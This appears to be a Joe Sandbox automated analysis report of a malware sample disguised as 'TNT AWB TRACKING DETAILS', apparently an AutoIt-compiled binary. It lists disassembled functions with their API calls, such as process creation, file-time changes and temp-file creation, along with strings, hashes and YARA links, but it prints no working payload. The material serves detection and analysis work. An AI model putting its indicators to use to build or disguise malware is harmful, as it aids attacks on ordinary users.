>>>AUTOIT SCRIPT<<<, xrefs: 00ADE039

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: 96ee3cae07f6435a1533136c4b4d5f3092fdaf058298fd3f49a1d331248cc92a
Instruction ID: 883cac62d8238cb6da7a166e6dcf4bd0fb37005d03a9f6f4020a5c9db5ec05db
Opcode Fuzzy Hash: 96ee3cae07f6435a1533136c4b4d5f3092fdaf058298fd3f49a1d331248cc92a
Instruction Fuzzy Hash: 97919E71A00219EFCF04EFA4CD819EEB7B8FF19310F14446AF816AB2A1DB74A945CB50

Function 039623E0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 166fileCOMMON

Download Yara Rule

APIs

Part of subcall function 039622D0: Sleep.KERNELBASE(000001F4), ref: 039622E1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03962543

Strings

A7XM48GAXE83WZLCS2CAT9SEOPJD, xrefs: 039625C3, 039625C6

Memory Dump Source

Source File: 00000000.00000002.2195463668.0000000003960000.00000040.00001000.00020000.00000000.sdmp, Offset: 03960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3960000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: CreateFileSleep
String ID: A7XM48GAXE83WZLCS2CAT9SEOPJD
API String ID: 2694422964-638165485
Opcode ID: 7b480b5778e1f34660a50f51d39405d04baa89c64ce43a948202baa5faf72cb3
Instruction ID: 75a84a8ed314d842703213b7343c53b5bdecb0980bf4c91c06a9676cbc7ff71e
Opcode Fuzzy Hash: 7b480b5778e1f34660a50f51d39405d04baa89c64ce43a948202baa5faf72cb3
Instruction Fuzzy Hash: 8171B430D08288DAEF11DBF4C854BEEBB79AF15304F044599E648BB2C1D7BA1B49CB65

Function 00AA35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00AA35A1,SwapMouseButtons,00000004,?), ref: 00AA35D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00AA35A1,SwapMouseButtons,00000004,?,?,?,?,00AA2754), ref: 00AA35F5
RegCloseKey.KERNELBASE(00000000,?,?,00AA35A1,SwapMouseButtons,00000004,?,?,?,?,00AA2754), ref: 00AA3617

Strings

Control Panel\Mouse, xrefs: 00AA35D2

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 0d836b3e5720a248e58517fabb3775798383c73ae8aa3e588ba54357ca5b61fb
Instruction ID: f7bc62d99f9b1764b556e32e79f1748c06495f3f2d769e66a2a633546fbcc676
Opcode Fuzzy Hash: 0d836b3e5720a248e58517fabb3775798383c73ae8aa3e588ba54357ca5b61fb
Instruction Fuzzy Hash: 00113672910208BADF208FA4D840DABB7B8EF05740F00846AB805D7250E7719E419B60

Function 00AC470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00AC47A0
__flush.LIBCMT ref: 00AC47C0
__write.LIBCMT ref: 00AC47F3
__flsbuf.LIBCMT ref: 00AC4821

Part of subcall function 00AC8B28: __getptd_noexit.LIBCMT ref: 00AC8B28

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction ID: d1b23a661ae4c479609aebee153ef0739f2eeef589ef82ae2e96b966329dfabd
Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction Fuzzy Hash: A441B375A007459BDF188FA9C9A0FAE7BB5AF49360B26813DE81587680DB74DD408B48

Function 00AA44A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AA44CF

Part of subcall function 00AA407C: _memset.LIBCMT ref: 00AA40FC
Part of subcall function 00AA407C: _wcscpy.LIBCMT ref: 00AA4150
Part of subcall function 00AA407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00AA4160

KillTimer.USER32(?,00000001,?,?), ref: 00AA4524
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00AA4533
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00ADD4B9

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 59d985c22bbd67354ad988a1c74d81c09538621c64fe84f89c5f614332a107f8
Instruction ID: 86b2c237db0106b43afd6197a475fd34c42739b783f87d61f924d3afc507d4f3
Opcode Fuzzy Hash: 59d985c22bbd67354ad988a1c74d81c09538621c64fe84f89c5f614332a107f8
Instruction Fuzzy Hash: 2F21C5B4904784AFE7328B24C855BE6BBFC9B46318F04009EF69A5B281C7B46E85CB51

Function 00AA7285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00ADEA39
GetOpenFileNameW.COMDLG32(?), ref: 00ADEA83

Part of subcall function 00AA4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA4743,?,?,00AA37AE,?), ref: 00AA4770

Part of subcall function 00AC0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00AC07B0

Strings

X, xrefs: 00ADEA51

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 2e1d5222d9926d982b6568885642d4089179d3290695a1021e2e1133a55c4428
Instruction ID: 695eda9da883be2b6e73ea517d69c5116dacd04f9c22d053c7f4fe20707f661c
Opcode Fuzzy Hash: 2e1d5222d9926d982b6568885642d4089179d3290695a1021e2e1133a55c4428
Instruction Fuzzy Hash: AF21C071A002489BCB51DF94CC45BEE7BFCAF49711F00405AE809BB281DFB4598D8FA1

Function 00B08D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00B08DAC
__fread_nolock.LIBCMT ref: 00B08DC1

Strings

EA06, xrefs: 00B08DF3

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 478ede8a5f758613b6fb580d1ba1875eed1ae6dadfd80987c62b857ed683b046
Instruction ID: 4d28d6e3f4faf6400d0bedbc5ef451282daffb7d855eb248d3a89791f6da8d16
Opcode Fuzzy Hash: 478ede8a5f758613b6fb580d1ba1875eed1ae6dadfd80987c62b857ed683b046
Instruction Fuzzy Hash: 1801B971D042187EDB18CAA9C856FEE7BF8DB15311F00469EF592D21C1E979E6088760

Function 03961000 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 03961045
ExitProcess.KERNEL32(00000000), ref: 03961064

Strings

D, xrefs: 03961011

Memory Dump Source

Source File: 00000000.00000002.2195463668.0000000003960000.00000040.00001000.00020000.00000000.sdmp, Offset: 03960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3960000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Process$CreateExit
String ID: D
API String ID: 126409537-2746444292
Opcode ID: 4638e4dcbcb64820f1c19d6545d26c0fb6ea82a3cd30bab000e26f1f9ebc6855
Instruction ID: 830a8a3df260c7ef4298c911f727a996706be5660940a7311eb1c6456aecb7f0
Opcode Fuzzy Hash: 4638e4dcbcb64820f1c19d6545d26c0fb6ea82a3cd30bab000e26f1f9ebc6855
Instruction Fuzzy Hash: 16F0FF7554124CABDF60EFE0CC49FEE777CBF44701F548909FB4A9A180DA7896088B61

Function 00B098E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00B098F8
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00B0990F

Strings

aut, xrefs: 00B09909

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 80459b2c5a5d2234096c68a0cf11b18181aee29432bd0467df4db3aad43e4503
Instruction ID: c56af2b831a7c8c70f63e6ede09233d9f81d0d1d19080a2b6829d2287661c04a
Opcode Fuzzy Hash: 80459b2c5a5d2234096c68a0cf11b18181aee29432bd0467df4db3aad43e4503
Instruction Fuzzy Hash: F6D05E7994030EABDB609BA0DC0EFAA777CE704701F0002F1BE54D21A1EEB195998BA1

Function 00B1CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24727f5471447ea3f17f931dfd3f05d8033e1f163616463d17c69254b9806acb
Instruction ID: fc091d1f0c35a34b21279bf6c0ba32da318d9215e97aef1bfacdffe65523645a
Opcode Fuzzy Hash: 24727f5471447ea3f17f931dfd3f05d8033e1f163616463d17c69254b9806acb
Instruction Fuzzy Hash: 0BF149716083019FCB14DF28C580A6ABBE5FF89314F54896EF8999B391D734E945CF82

Function 00AAF76F Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 00AC0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AC0193
Part of subcall function 00AC0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00AC019B
Part of subcall function 00AC0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AC01A6
Part of subcall function 00AC0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AC01B1
Part of subcall function 00AC0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00AC01B9
Part of subcall function 00AC0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00AC01C1

Part of subcall function 00AB60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00AAF930), ref: 00AB6154

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00AAF9CD
OleInitialize.OLE32(00000000), ref: 00AAFA4A
CloseHandle.KERNEL32(00000000), ref: 00AE45C8

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 9e71466b44801693f77120cf44d26618e3e5ebfdc837334e95e9932de3db939f
Instruction ID: 8a018c6d127681d045d708dcbce56cc18dbf89fc1270547348a623f3cdb49953
Opcode Fuzzy Hash: 9e71466b44801693f77120cf44d26618e3e5ebfdc837334e95e9932de3db939f
Instruction Fuzzy Hash: 5B81CEB1901A408EC3B4DF39AD446697BE9FB58306F5081AAD059CB3E9EFF844A48F14

Function 00AA434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AA4370
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00AA4415
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00AA4432

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: b91c3d0431e5d6a7334b92cd3a645fb587e456f8f034d8a6b1a25bbe6e0d0615
Instruction ID: 90e90aaf1055ab86b01b7a2e4bb7866f7774026fc676ae0374417b913822c265
Opcode Fuzzy Hash: b91c3d0431e5d6a7334b92cd3a645fb587e456f8f034d8a6b1a25bbe6e0d0615
Instruction Fuzzy Hash: 843150B05047019FD761DF24D88469BBBF8FB9D309F00092EF59A87291DBB5A944CB52

Function 00AC571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00AC5733

Part of subcall function 00ACA16B: __NMSG_WRITE.LIBCMT ref: 00ACA192
Part of subcall function 00ACA16B: __NMSG_WRITE.LIBCMT ref: 00ACA19C

__NMSG_WRITE.LIBCMT ref: 00AC573A

Part of subcall function 00ACA1C8: GetModuleFileNameW.KERNEL32(00000000,00B633BA,00000104,?,00000001,00000000), ref: 00ACA25A
Part of subcall function 00ACA1C8: ___crtMessageBoxW.LIBCMT ref: 00ACA308

Part of subcall function 00AC309F: ___crtCorExitProcess.LIBCMT ref: 00AC30A5
Part of subcall function 00AC309F: ExitProcess.KERNEL32 ref: 00AC30AE

Part of subcall function 00AC8B28: __getptd_noexit.LIBCMT ref: 00AC8B28

RtlAllocateHeap.NTDLL(013E0000,00000000,00000001,00000000,?,?,?,00AC0DD3,?), ref: 00AC575F

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 30599d8d4db16a5971c678ac18cc04e67e62cfe60477ad0b14b3299a384ac6a0
Instruction ID: 59453bc07a0a920d3e6db2937a829aea6a6a05112fa41f19a8672a2ad2b30105
Opcode Fuzzy Hash: 30599d8d4db16a5971c678ac18cc04e67e62cfe60477ad0b14b3299a384ac6a0
Instruction Fuzzy Hash: 6A01F536A00B11DEDA102B74ED42F2E7398DB52761F53092DF505AB1C1DFB4ACC04660

Function 00B098A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00B09548,?,?,?,?,?,00000004), ref: 00B098BB
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00B09548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00B098D1
CloseHandle.KERNEL32(00000000,?,00B09548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00B098D8

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: aea1732de9cc8bb516ead71be1714934c794754761dc35969fd50037aade6de4
Instruction ID: 82658998302e97ba59691cf912b438a0246994dd2f007c30dbac1b7b691f5ace
Opcode Fuzzy Hash: aea1732de9cc8bb516ead71be1714934c794754761dc35969fd50037aade6de4
Instruction Fuzzy Hash: 66E08632141315B7D7311B54EC0AFDA7F69EB06B61F108230FB147A0E08BB119229798

Function 00B08D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00B08D1B

Part of subcall function 00AC2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00AC9A24), ref: 00AC2D69
Part of subcall function 00AC2D55: GetLastError.KERNEL32(00000000,?,00AC9A24), ref: 00AC2D7B

_free.LIBCMT ref: 00B08D2C
_free.LIBCMT ref: 00B08D3E

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e92dce40d9500f9ac2a34e83b90a716ef22a9282606ba49fbfd8bfa905bb999e
Instruction ID: 6f90bc654fdfbaeb095126fef57af860952fbd373f143999227befaceb9eba13
Opcode Fuzzy Hash: e92dce40d9500f9ac2a34e83b90a716ef22a9282606ba49fbfd8bfa905bb999e
Instruction Fuzzy Hash: 85E012E161160157CF25A5B8AA40F9327DC9F683527150B7DB44ED71C6CE64F9428228

Function 00AAA9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 00ADFC01

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 89d3d00da4e52937dd14de77de882156bd52ff87026d0eb671879f2413ace455
Instruction ID: ec7e3740d1d1f65f60de92a19a4e0edf151f956f4f329f2bb3fbb6c6fa05c1a0
Opcode Fuzzy Hash: 89d3d00da4e52937dd14de77de882156bd52ff87026d0eb671879f2413ace455
Instruction Fuzzy Hash: E0225870608341DFD724DF14C590A6ABBF1BF9A304F15896DE89A8B3A2D735EC45CB82

Function 00AA4C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00AA4CBA

Strings

EA06, xrefs: 00ADD8CC

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: 34f3a4432ac603f5cc6e304e42e6eca8cf4fe3ee8bf6933792defe8ac5454bd1
Instruction ID: 4f9a679111df2805f82a0e3b34d55b4fc6499efe9fde0044ce9b4351767b985e
Opcode Fuzzy Hash: 34f3a4432ac603f5cc6e304e42e6eca8cf4fe3ee8bf6933792defe8ac5454bd1
Instruction Fuzzy Hash: 80415D31A041586BDF229F64C9527BEBFB29BCF300F284475FC869B2C6D7A09D4483A1

Function 00AA7A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00AA7AAB
_memmove.LIBCMT ref: 00AA7B16

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 630de389cfef8e2d39315435e07561fa4a2c23e41d94d48d3e39174cec6caf11
Instruction ID: 9a1e0c9a58d5c6bd66505750b92172125467154c53ebd6802917a497f467e4f5
Opcode Fuzzy Hash: 630de389cfef8e2d39315435e07561fa4a2c23e41d94d48d3e39174cec6caf11
Instruction Fuzzy Hash: E93173B1604606AFC704DF68CDD1E6EB3A9FF49350715862DE51ACB2D1EB30E950CB90

